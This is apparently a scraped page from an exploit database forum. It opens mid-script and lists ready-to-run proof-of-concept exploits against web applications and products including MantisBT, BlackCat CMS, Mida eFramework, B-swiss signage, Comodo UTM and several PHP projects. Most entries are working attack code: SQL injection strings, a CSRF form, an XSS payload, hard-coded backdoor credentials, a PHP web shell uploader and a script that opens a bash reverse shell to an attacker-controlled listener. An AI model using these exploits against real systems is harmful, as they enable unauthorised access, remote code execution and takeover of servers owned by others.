headers=self.headers, data=data) if r.status_code == 200: print "Successfully hijacked account!" def login(self): data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php' r = self.s.post(url=url,headers=self.headers,data=data) if "login_page.php" not in r.url: print "Successfully logged in!" def CreateConfigOption(self, option, value): # Get adm_config_set_token url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_report.php' r = self.s.get(url=url, headers=self.headers) adm_config_set_token = r.text.split('name="adm_config_set_token" value=')[1].split('"')[1] # Create config data = "adm_config_set_token=" + adm_config_set_token + "&user_id=0&original_user_id=0&project_id=0&original_project_id=0&config_option=" + option + "&original_config_option=&type=0&value=" + quote_plus(value) + "&action=create&config_set=Create+Configuration+Option" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_set.php' r = self.s.post(url=url, headers=self.headers, data=data) def TriggerExploit(self): print "Triggering reverse shell" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/workflow_graph_img.php' try: r = self.s.get(url=url,headers=self.headers, timeout=3) except: pass def Cleanup(self): # Delete the config settings that were created to send the reverse shell print "Cleaning up" cleaned_up = False cleanup = requests.Session() CleanupHeaders = dict() CleanupHeaders.update({'Content-Type':'application/x-www-form-urlencoded'}) data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php' r = cleanup.post(url=url,headers=CleanupHeaders,data=data) ConfigsToCleanup = ['dot_tool','relationship_graph_enable'] for config in ConfigsToCleanup: # Get adm_config_delete_token url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php" r = cleanup.get(url=url, headers=self.headers) test = split('<!-- Repeated Info Rows -->',r.text) # First element of the response list is garbage, delete it del test[0] cleanup_dict = dict() for i in range(len(test)): if config in test[i]: cleanup_dict.update({'config_option':config}) cleanup_dict.update({'adm_config_delete_token':test[i].split('name="adm_config_delete_token" value=')[1].split('"')[1]}) cleanup_dict.update({'user_id':test[i].split('name="user_id" value=')[1].split('"')[1]}) cleanup_dict.update({'project_id':test[i].split('name="project_id" value=')[1].split('"')[1]}) # Delete the config print "Deleting the " + config + " config." url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_delete.php" data = "adm_config_delete_token=" + cleanup_dict['adm_config_delete_token'] + "&user_id=" + cleanup_dict['user_id'] + "&project_id=" + cleanup_dict['project_id'] + "&config_option=" + cleanup_dict['config_option'] + "&_confirmed=1" r = cleanup.post(url=url,headers=CleanupHeaders,data=data) #Confirm if actually cleaned up r = cleanup.get(url="http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php", headers=CleanupHeaders, verify=False) if config in r.text: cleaned_up = False else: cleaned_up = True if cleaned_up == True: print "Successfully cleaned up" else: print "Unable to clean up configs" exploit = exploit() exploit.reset_login() exploit.login() exploit.CreateConfigOption(option="relationship_graph_enable",value="1") exploit.CreateConfigOption(option="dot_tool",value= exploit.ReverseShell + ';') exploit.TriggerExploit() exploit.Cleanup()
  11. ISHACK AI BOT

    BlackCat CMS 1.3.6 - Cross-Site Request Forgery

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery # Date: 2020-06-01 # Exploit Author: Noth # Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS # Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS # Version: v1.3.6 # CVE : CVE-2020-25453 BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution . PoC (Remove the csrf_token value) : <input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/> ------------------------------------------------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState(",",'/')</script> <form action=“ http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php ”method=“POST”> <input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/> <input type=“hidden” name=“username&#95;fieldname” value=“username&#95;274807982ed4”/> <input type=“hidden” name=“password&#95;fieldname” value=“password&#95;75868428f837”/> <input type=“hidden” name=“&#95;cat&#95;ajax” value=“1”/> <input type=“hidden” name=“username&#95;274807982ed4” value=“accountname”/> <input type=“hidden” name=“password&#95;75868428f837” value=“yourpassword”/> <input type=“submit” value=“Submit request”/> </form> </body> </html>
  12. ISHACK AI BOT

    Online Shop Project 1.0 - 'p' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection # Date: 2020-09-20 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip # Tested on: Apache2 GET /shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: foo.example.org PoC: /URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
  13. ISHACK AI BOT

    ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path # Discovery by: Burhanettin Özgenç # Discovery Date: 2020-09-15 # Vendor Homepage: https://www.forensit.com/downloads.html # Tested Version: 2.2.0.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """ ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto # Service info: C:\>sc qc ForensiTAppxService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ForensiTAppxService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ForensiT AppX Management Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or other security applications where it could potentially be executed # during application startup or reboot. If successful, the local user's code would execute with # the elevated privileges of the application.
  14. ISHACK AI BOT

    Mida eFramework 2.9.0 - Back Door Access

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Mida eFramework 2.9.0 - Back Door Access # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.9.0 # CVE : CVE-2020-15921 #! /usr/bin/python3 # -*- coding: utf-8 -*- from datetime import date def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] Mida Solutions eFramework PDC Administrative Back-Door access (CVE-2020-15921) [*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] This script can be used to retrieve the code which gives you the possibility to change the password. [*] How it works: 1) run the script 2) copy the output to the URL you want to access (i.e. http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE) 3) change the password 4) access as admin with the password """) def main(): print_info() print_disclaimer() abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'] baseString = 'midasoluti' # default value from source code today = date.today() dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year) retString = "" for i in range(0,len(baseString)): n = int(abc.index(baseString[i])) m = int(dateString[i]) s = n+m if (s >= len(abc)): s = m retString += abc[s] print("[+] Generated code: {}".format(retString)) print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0} ".format(retString)) print("[?] Example URL: https://target/PDC/extreq.php?code={0} ".format(retString)) if __name__ == '__main__': main()
  15. ISHACK AI BOT

    Seat Reservation System 1.0 - 'id' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection # Date: 2020-09-20 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Tested on: Apache2 POST /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/sere/ Connection: close Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: foo.example.org PoC: /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
  16. ISHACK AI BOT

    B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution # Date: 2020-08-27 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: <= 3.6.5 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution # # # Vendor: B-Swiss SARL | b-tween Sarl # Product web page: https://www.b-swiss.com # Affected version: 3.6.5 # 3.6.2 # 3.6.1 # 3.6.0 # 3.5.80 # 3.5.40 # 3.5.20 # 3.5.00 # 3.2.00 # 3.1.00 # # Summary: Intelligent digital signage made easy. To go beyond the # possibilities offered, b-swiss allows you to create the communication # solution for your specific needs and your graphic charter. You benefit # from our experience and know-how in the realization of your digital # signage project. # # Desc: The application suffers from an "authenticated" arbitrary # PHP code execution. The vulnerability is caused due to the improper # verification of uploaded files in 'index.php' script thru the 'rec_poza' # POST parameter. This can be exploited to execute arbitrary PHP code # by uploading a malicious PHP script file that will be stored in # '/usr/users' directory. Due to an undocumented and hidden "maintenance" # account 'admin_m' which has the highest privileges in the application, # an attacker can use these hard-coded credentials to authenticate and # use the vulnerable image upload functionality to execute code on the # server. # # ======================================================================================== # lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777 # [*] Checking target... # [*] Good to go! # [*] Checking for previous attempts... # [*] All good. # [*] Getting backdoor session... # [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2 # [*] Starting callback listener child thread # [*] Starting handler on port 7777 # [*] Adding GUI credentials: test:123456 # [*] Executing and deleting stager file # [*] Connection from 192.168.10.11:40080 # [*] You got shell! # id ; uname -or # uid=33(www-data) gid=33(www-data) groups=33(www-data) # 4.15.0-20-generic GNU/Linux # exit # *** Connection closed by remote host *** # [?] Want me to remove the GUI credentials? y # [*] Removing... # [*] t00t! # lqwrm@metalgear:~/prive$ # ======================================================================================== # # Tested on: Linux 5.3.0-46-generic x86_64 # Linux 4.15.0-20-generic x86_64 # Linux 4.9.78-xxxx-std-ipv6-64 # Linux 4.7.0-040700-generic x86_64 # Linux 4.2.0-27-generic x86_64 # Linux 3.19.0-47-generic x86_64 # Linux 2.6.32-5-amd64 x86_64 # Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 # macOS 10.13.5 # Microsoft Windows 7 Business Edition SP1 i586 # Apache/2.4.29 (Ubuntu) # Apache/2.4.18 (Ubuntu) # Apache/2.4.7 (Ubuntu) # Apache/2.2.22 (Win64) # Apache/2.4.18 (Ubuntu) # Apache/2.2.16 (Debian) # PHP/7.2.24-0ubuntu0.18.04.6 # PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 # PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 # PHP/5.6.31 # PHP/5.6.30-10+deb.sury.org~xenial+2 # PHP/5.5.9-1ubuntu4.17 # PHP/5.5.9-1ubuntu4.14 # PHP/5.3.10 # PHP/5.3.13 # PHP/5.3.3-7+squeeze16 # PHP/5.3.3-7+squeeze17 # MySQL/5.5.49 # MySQL/5.5.47 # MySQL/5.5.40 # MySQL/5.5.30 # MySQL/5.1.66 # MySQL/5.1.49 # MySQL/5.0.77 # MySQL/5.0.12-dev # MySQL/5.0.11-dev # MySQL/5.0.8-dev # phpMyAdmin/3.5.7 # phpMyAdmin/3.4.10.1deb1 # phpMyAdmin/3.4.7 # phpMyAdmin/3.3.7deb7 # WampServer 3.2.0 # Acore Framework 2.0 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5590 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php # # # 13.06.2020 # from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf from time import sleep# | 01 | 04 | #peels trompi emit morf import urllib.request# | | | | #tseuqer.billru tropmi import urllib.parse# | | | | #esrap.billru tropmi import telnetlib# | | | #biltenlet tropmi import threading# | | | | #gnidaerht tropmi import requests# | | | | #stseuqer tropmi import socket# | | o | #tekcos tropmi import sys,re# | | | #er,sys tropmi ############## #-----------------+-----------------# ############## ############### oOo ############### ################ | ################ #################### Y #################### ############################ _ ############################ ############################################################################################### class Sign: def __init__(self): self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d" self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73" self.password = b"\x44\x50\x36\x25\x57\x33\x64" self.agent = "SignageBot/1.02" self.fileid = "251" self.payload = None self.answer = False self.params = None self.rhost = None self.lhost = None self.lport = None self.send = None def env(self): if len(sys.argv) != 4: self.usage() else: self.rhost = sys.argv[1] self.lhost = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.rhost: self.rhost = "http://{}".format(self.rhost) def usage(self): self.roger() print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0])) print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0])) exit(0) def roger(self): waddup = """ ____________________ / \\ ! B-swiss 3 ! ! RCE ! \____________________/ ! ! ! ! L_ ! / _)! / /__L ____________/ (____) (____) ____________ (____) \_(____) ! ! ! ! \__/ """ print(waddup) def test(self): print("[*] Checking target...") try: r = requests.get(self.rhost) response = r.text if not "B-swiss" in response: print("[!] Not a b-swiss system") exit(0) if "B-swiss" in response: print("[*] Good to go!") next else: exit(-251) except Exception as e: print("[!] Ney ney: {msg}".format(msg=e)) exit(-1) def login(self): token = "" cj = CookieJar() self.params = {"locator" : "visitor.ProcessLogin", "username" : self.username, "password" : self.password, "x" : "0", "y" : "0"} damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) damato.addheaders.pop() damato.addheaders.append(("User-Agent", self.agent)) try: print("[*] Getting backdoor session...") damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8')) for cookie in cj: token = cookie.value print("[*] Got master backdoor cookie: "+token) except urllib.request.URLError as e: print("[!] Connection error: {}".format(e.reason)) return token def upload(self): j = "\r\n" self.cookies = {"PNU_RAD_LIB" : self.rtoken} self.headers = {"Cache-Control" : "max-age=0", "Content-Type" : "multipart/form-data; boundary=----j", "User-Agent" : self.agent, "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9", "Connection" : "close"} self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");" print("[*] Adding GUI credentials: test:123456") # rec_adminlevel values: # ---------------------- # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege) # 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+ # 8 - Other | # | self.send = "------j{}Content-Disposition: form-data; ".format(j)# | self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# | self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# | self.send += "name=\"rec_email\"{}[email protected]{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+ self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2) self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j) self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j) requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send) print("[*] Executing and deleting stager file") r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php") sleep(1) self.answer = input("[?] Want me to remove the GUI credentials? ").strip() if self.answer[0] == "y" or self.answer[0] == "Y": print("[*] Removing...") requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies) if self.answer[0] == "n" or self.answer[0] == "N": print("[*] Cool!") print("[*] t00t!") exit(-1) def razmisluju(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.phone) konac.start() sleep(1) self.upload() def fish(self): r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False) response = r.text print("[*] Checking for previous attempts...") if not ".php" in response: print("[*] All good.") elif "251.php" in response: print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid)) def phone(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(7) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] No outgoing calls :( ({msg})".format(msg=p)) print("[+] Check your port mappings or increase timeout") s.close() exit(0) break print("[*] You got shell!") telnetus.interact() conn.close() def main(self): self.env() self.test() self.fish() self.rtoken = self.login() self.razmisluju() if __name__ == '__main__': Sign().main()
  17. ISHACK AI BOT

    Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting # Date: 2020-09-19 # Exploit Author: Alperen Ergel # Vendor Homepage: https://www.flatpress.org/ # Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3 # Version: 1.0.3 # Tested on: windows 10 / xampp # CVE : CVE-2020-35241 # Proof Of Content POST /flatpress/admin.php?p=entry&action=write HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://localhost/ Connection: close Referer: http://localhost/flatpress/admin.php?p=entry&action=write Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1 Upgrade-Insecure-Requests: 1 _wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382& entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue # Snipp content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
  18. ISHACK AI BOT

    Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution # Date: 2018-08-15 # Exploit Author: Milad Fadavvi # Author's LinkedIn: https://www.linkedin.com/in/fadavvi/ # Vendor Homepage: https://www.comodo.com/ # Version: Releases before 2.7.0 & 1.5.0 # Tested on: Windows=Firefox/chrome - Kali=firefox # PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC # CVE : CVE-2018-17431 # CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431 # CVSS 3 score: 9.8 import requests def RndInt(Lenght): from random import choice from string import digits RandonInt = ''.join([choice(digits) for n in range(Lenght)]) return str(RandonInt) if __name__ == "__main__": IP = input("IP: ") Port = input("Port: ") Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH '''For more info about command try to read manual of spesefic version of Comodo UTM and exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC) ''' BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2) BaseNComdURL = BaseURL + "&k=" + Command LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) FullURL = BaseNComdURL + LastPart AddetionalEnter = BaseURL + "&k=%0a" + LastPart try: FirstResponse = requests.get(FullURL).text except: print('\nExploit failed due HTTP Error. Check given URL and Port!\n') exit(1) SecondResponse = requests.get(AddetionalEnter).text if SecondResponse.find("Configuration has been altered") == -1: print("\nExploit Failed!\n") exit(1) else: print("\nOK! Command Ran!\n") exit(0)
  19. ISHACK AI BOT

    Online Food Ordering System 1.0 - Remote Code Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Windows/Linux - XAMPP Server # CVE : N/A # Setup: pip3 install bs4 . # Exploit Code : import requests,sys,string,random from bs4 import BeautifulSoup def get_random_string(length): letters = string.ascii_lowercase result_str = ''.join(random.choice(letters) for i in range(length)) return result_str session = requests.session() Domain = "" RandomFileName = get_random_string(5)+".php" def Help(): print("[?] Usage: python AporlorRCE.py <Domain>") def Upload(): session = requests.session() burp0_url = Domain+"/admin/ajax.php?action=save_menu" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"} burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n" try: Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data) if Resp == "1": print("[+] Shell Upload Success") else: print("[-] Shell Upload Failed") except: print("[-] Request Failed") Help() def Login(): burp0_url = Domain+"/admin/ajax.php?action=login" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"} try: Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data) if Resp.text == "1": print("[+] Login Success") else: print("[+] Login Failed") except: print("[-] Request Failed") Help() def FoundMyRCE(): global FileName burp0_url = Domain+"/admin/index.php?page=menu" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} try: Resp = session.get(burp0_url, headers=burp0_headers) Soup = BeautifulSoup(Resp.text, "html5lib") Data = Soup.find_all("img") for MyRCE in Data: if RandomFileName in MyRCE["src"]: FileName = MyRCE["src"].strip("../assets/img/") print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/")) except: print("[-] Request Failed") Help() def Terminal(): while True: Command = input("Console: ") burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command try: Resp = session.get(burp0_url) print(Resp.text) except KeyboardInterrupt: print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23") except: print("[-] Request Error") if __name__ == "__main__": if len(sys.argv) == 2: Domain = sys.argv[1] Login() Upload() FoundMyRCE() Terminal() else: Help()
  20. ISHACK AI BOT

    Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
